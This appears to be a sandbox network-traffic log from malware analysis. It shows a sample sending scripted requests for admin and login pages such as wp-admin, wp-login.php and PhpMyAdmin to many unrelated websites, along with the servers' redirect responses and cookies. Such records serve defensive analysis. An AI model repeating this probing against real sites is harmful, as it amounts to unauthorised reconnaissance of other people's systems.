                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810681105 CET1286INData Raw: 6d 65 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 0a 4d 2e 63 66 67 20 3d 20 7b 22 77 77 77 72 6f 6f 74 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 22 2c 22 73 65 73 73 6b 65 79 22 3a 22 48 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: me = new Date();M.cfg = {"wwwroot":"http:\/\/ucivirtual.uci.edu.mx","sesskey":"HdEOmccxQW","sessiontimeout":"7200","themerev":"1656634060","slasharguments":1,"theme":"boost","iconsystemmodule":"core\/icon_system_fontawesome","jsrev":"16147385
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810698986 CET1286INData Raw: 5c 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 5c 2f 74 68 65 6d 65 5c 2f 79 75 69 5f 63 6f 6d 62 6f 2e 70 68 70 3f 22 2c 22 63 6f 6d 62 69 6e 65 22 3a 74 72 75 65 2c 22 65 78 74 22 3a 66 61 6c 73 65 2c 22 72 6f 6f 74 22 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \/ucivirtual.uci.edu.mx\/theme\/yui_combo.php?","combine":true,"ext":false,"root":"2in3\/2.9.0\/build\/","patterns":{"yui2-":{"group":"yui2","configFn":yui1ConfigFn}}},"moodle":{"name":"moodle","base":"http:\/\/ucivirtual.uci.edu.mx\/theme\/yu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810714960 CET1286INData Raw: 75 67 69 6e 22 2c 22 62 61 73 65 2d 62 75 69 6c 64 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6d 61 69 6e 74 65 6e 61 6e 63 65 6d 6f 64 65 74 69 6d 65 72 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 62 61 73 65 22 2c 22 6e 6f 64 65 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ugin","base-build"]},"moodle-core-maintenancemodetimer":{"requires":["base","node"]},"moodle-core-notification":{"requires":["moodle-core-notification-dialogue","moodle-core-notification-alert","moodle-core-notification-confirm","moodle-core-n
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810734034 CET1286INData Raw: 22 2c 22 61 6e 69 6d 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 62 61 63 6b 75 70 2d 63 6f 6e 66 69 72 6d 63 61 6e 63 65 6c 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 6e 6f 64 65 22 2c 22 6e 6f 64 65 2d 65 76 65 6e 74 2d 73 69 6d 75 6c 61 74 65 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ","anim"]},"moodle-backup-confirmcancel":{"requires":["node","node-event-simulate","moodle-core-notification-confirm"]},"moodle-course-categoryexpander":{"requires":["node","event-key"]},"moodle-course-dragdrop":{"requires":["base","node","io"
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810750961 CET1286INData Raw: 7d 2c 22 6d 6f 6f 64 6c 65 2d 71 75 65 73 74 69 6f 6e 2d 70 72 65 76 69 65 77 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 62 61 73 65 22 2c 22 64 6f 6d 22 2c 22 65 76 65 6e 74 2d 64 65 6c 65 67 61 74 65 22 2c 22 65 76 65 6e 74 2d 6b 65 79 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: },"moodle-question-preview":{"requires":["base","dom","event-delegate","event-key","core_question_user"]},"moodle-question-searchform":{"requires":["base","node"]},"moodle-availability_completion-form":{"requires":["base","node","event","moo
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810766935 CET1286INData Raw: 64 65 22 2c 22 65 76 65 6e 74 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 6d 6f 64 5f 71 75 69 7a 2d 71 75 65 73 74 69 6f 6e 63 68 6f 6f 73 65 72 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 63 68 6f 6f 73 65 72 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: de","event"]},"moodle-mod_quiz-questionchooser":{"requires":["moodle-core-chooserdialogue","moodle-mod_quiz-util","querystring-parse"]},"moodle-mod_quiz-quizbase":{"requires":["base","node"]},"moodle-mod_quiz-toolboxes":{"requires":["base","no
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810782909 CET1286INData Raw: 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 63 6f 6e 66 69 72 6d 22 2c 22 6d 6f 6f 64 6c 65 2d 65 64 69 74 6f 72 5f 61 74 74 6f 2d 72 61 6e 67 79 22 2c 22 68 61 6e 64 6c 65 62 61 72 73 22 2c 22 74 69 6d 65 72 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "moodle-core-notification-confirm","moodle-editor_atto-rangy","handlebars","timers","querystring-stringify"]},"moodle-editor_atto-plugin":{"requires":["node","base","escape","event","event-outside","handlebars","event-custom","timers","moodle-
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810800076 CET1286INData Raw: 65 72 79 73 74 72 69 6e 67 2d 73 74 72 69 6e 67 69 66 79 2d 73 69 6d 70 6c 65 22 2c 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 64 69 61 6c 6f 67 22 2c 22 6d 6f 6f 64 6c 65 2d 63 6f 72 65 2d 6e 6f 74 69 66 69 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: erystring-stringify-simple","moodle-core-notification-dialog","moodle-core-notification-alert","moodle-core-notification-warning","moodle-core-notification-exception","moodle-core-notification-ajaxexception"]},"moodle-atto_accessibilitychecker
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810817003 CET1286INData Raw: 61 6e 67 65 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 61 74 74 6f 5f 68 74 6d 6c 2d 63 6f 64 65 6d 69 72 72 6f 72 22 3a 7b 22 72 65 71 75 69 72 65 73 22 3a 5b 22 6d 6f 6f 64 6c 65 2d 61 74 74 6f 5f 68 74 6d 6c 2d 63 6f 64 65 6d 69 72 72 6f 72 2d 73 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ange"]},"moodle-atto_html-codemirror":{"requires":["moodle-atto_html-codemirror-skin"]},"moodle-atto_image-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_indent-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_i
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810841084 CET1286INData Raw: 74 6f 72 5f 61 74 74 6f 2d 70 6c 75 67 69 6e 22 2c 22 6d 6f 6f 64 6c 65 2d 65 64 69 74 6f 72 5f 61 74 74 6f 2d 6d 65 6e 75 22 2c 22 65 76 65 6e 74 22 2c 22 65 76 65 6e 74 2d 76 61 6c 75 65 63 68 61 6e 67 65 22 5d 7d 2c 22 6d 6f 6f 64 6c 65 2d 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tor_atto-plugin","moodle-editor_atto-menu","event","event-valuechange"]},"moodle-atto_title-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_underline-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_undo-button":


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                474192.168.2.665140103.224.182.21080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.503443956 CET174OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.665235996 CET342INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131770.6688208; expires=Thu, 02-Feb-2034 11:16:10 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/admin?sub1=20240205-2216-10dd-af1c-3865e2a64b77
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                475192.168.2.665145104.255.105.7980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.503495932 CET185OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.625916958 CET148INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://signin.rockstargames.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                476192.168.2.66513587.233.198.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.503544092 CET184OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.697038889 CET121INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                477192.168.2.665166138.197.59.19980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.503668070 CET178OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.625653982 CET552INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/admin
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 334
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/admin">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                478192.168.2.6651643.134.125.17580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.503703117 CET191OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.627414942 CET330INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 9586c048e6ab93e7b5fd12f005048b42
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 86
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/wp-login.php">Temporary Redirect</a>.
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.180712938 CET249OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://3fba-180-252-166-236.ngrok.io/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.304466963 CET324INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 09f9ba58dc22fac7f991cd382d7bd964
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/wp-admin/">Temporary Redirect</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                479192.168.2.665172142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.504776001 CET181OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.628552914 CET486INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.628566027 CET185INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 cf 4d da 6b 89 01 5b 63 2d 28 82 e4 d0 1e 45 83 11 8c 1b 34 b6 f4 ef 1b d3 1e 3b 97 65 67 87 e1 2d cb 65 59 f0 88 e5 22 49 fd 90 37 59 08 5e c2 53 75 48 2a 63 61 6e e6 61 7c 33 fa
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHMk[c-(E4;eg-eY"I7Y^SuH*cana|3=D*}RU]wCzIPjndB%(Ec]N6m"-a"V['ox6<
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.205627918 CET229OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://accounts.google.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.324656010 CET483INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.324673891 CET183INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 cf 35 ed b5 c4 80 ad b1 16 14 41 f6 d0 1e 43 0c 46 30 46 34 b6 f4 ef 1b d3 1e 3b 97 65 67 87 e1 2d 2d a0 2a 59 44 0b 9e 66 7e c0 0d 4a ce 2a fb 54 2d 02 65 26 3b 8b b9 1f de 94 7c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EH5ACF0F4;eg--*YDf~J*T-e&;|%|e$xa~=hZ+WFX9ysr"DHi-qgm7XZC^^fZmhO


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                480192.168.2.66517854.183.63.24180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.507181883 CET173OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.678659916 CET801INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=75ead7575354d04015590554959bc526; expires=Mon, 04 Mar 2024 11:16:10 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=75ead7575354d04015590554959bc526; expires=Mon, 04 Mar 2024 11:16:10 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                location: https://pt.secure.imvu.com/admin/
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: 2FzVpkirM5RWuKPfsD0ZsTNMaoHF7GF
                                                                                                                                                                                                                                                                                                                                                                X-Server: Smartling
                                                                                                                                                                                                                                                                                                                                                                X-SL-Notranslate: 1
                                                                                                                                                                                                                                                                                                                                                                X-SL-Norewrite: 1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                481192.168.2.665123124.237.208.3780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.510327101 CET168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.223927975 CET168OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.620256901 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=68F91CB36893B7EB62E3CE0CD37C2F12:FG=1; expires=Tue, 04-Feb-25 11:16:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821104636489671
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0wSdTcES3b+qnFLvvIASADwtAFKxCqAkOm5
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
